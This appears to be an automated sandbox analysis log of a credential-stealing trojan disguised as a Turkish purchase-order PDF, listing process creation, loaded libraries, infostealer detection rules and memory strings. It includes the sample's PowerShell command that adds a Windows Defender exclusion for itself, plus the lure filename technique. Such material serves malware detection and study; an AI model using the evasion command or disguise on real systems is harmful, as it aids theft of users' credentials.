Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Code functions: 5_2_0271DC74, 5_2_05E95580, 5_2_05E95F30, 5_2_05E93EA8, 5_2_05E9B6B8, 5_2_05E95148, 5_2_05E95139, 5_2_05E93A70
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Code functions: 9_2_02AB9760, 9_2_02AB4AB0, 9_2_02AB3E98, 9_2_02AB41E0, 9_2_02ABCDB0, 9_2_06171768, 9_2_06172F08, 9_2_061709C0, 9_2_061780E2, 9_2_061780E8, 9_2_06172820
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code functions: 10_2_0158DC74, 10_2_05AFC000, 10_2_05AFCBC0, 10_2_05AF0428, 10_2_05AF4663, 10_2_05AF3CA0, 10_2_05AFBA50, 10_2_066FAE48, 10_2_066F3EA8, 10_2_066F5F30, 10_2_066F5580, 10_2_066F3A70, 10_2_066F5148, 10_2_066F5139
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code functions: 12_2_00F69638, 12_2_00F6C8C0, 12_2_00F64AB0, 12_2_00F63E98, 12_2_00F641E0, 12_2_05E10448, 12_2_05E111F0, 12_2_05E12D90, 12_2_05E122A8, 12_2_05E17F82, 12_2_05E17F88
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code functions: 13_2_0131DC74, 13_2_0609AE48, 13_2_06093EA8, 13_2_06095F30, 13_2_06095580, 13_2_06093A70, 13_2_06095139, 13_2_06095148
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code functions: 14_2_01209638, 14_2_0120C988, 14_2_01204AB0, 14_2_01208E5C, 14_2_01203E98, 14_2_012041E0, 14_2_060E0448, 14_2_060E11F0, 14_2_060E6C4C, 14_2_060E2D90, 14_2_060E22A8, 14_2_060E7F7A, 14_2_060E7F88, 14_2_060E6C40, 14_2_060E8C72
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1328454130.00000000050C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1318702019.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1329165179.0000000006220000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1320959148.00000000028D2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename960d76e1-393e-4e96-a64a-e2af17492795.exe4 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1320959148.0000000002851000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename960d76e1-393e-4e96-a64a-e2af17492795.exe4 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1328797521.0000000005BA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2535482953.00000000009E9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Binary or memory string: OriginalFilenamePrWF.exe> vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, roEs93G.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, roEs93G.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, BIfda5lRrt3Eiso9an.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.cs | Security API names: _0020.SetAccessControl
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, BIfda5lRrt3Eiso9an.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, tiGbCdWd4bev0iB2DA.cs | Security API names: _0020.SetAccessControl
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, tiGbCdWd4bev0iB2DA.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, tiGbCdWd4bev0iB2DA.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.50e0000.7.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.28b7e4c.2.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.28a7e34.0.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@12/9@1/1
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Mutant created: \Sessions\1\BaseNamedObjects\sIgyAqxTUc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkkj1iex.1pz.ps1
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000C.00000002.1548552550.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000C.00000002.1548552550.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000E.00000002.2544912217.0000000002D06000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000E.00000002.2544912217.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | File read: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process created: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process created: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: cryptbase.dll
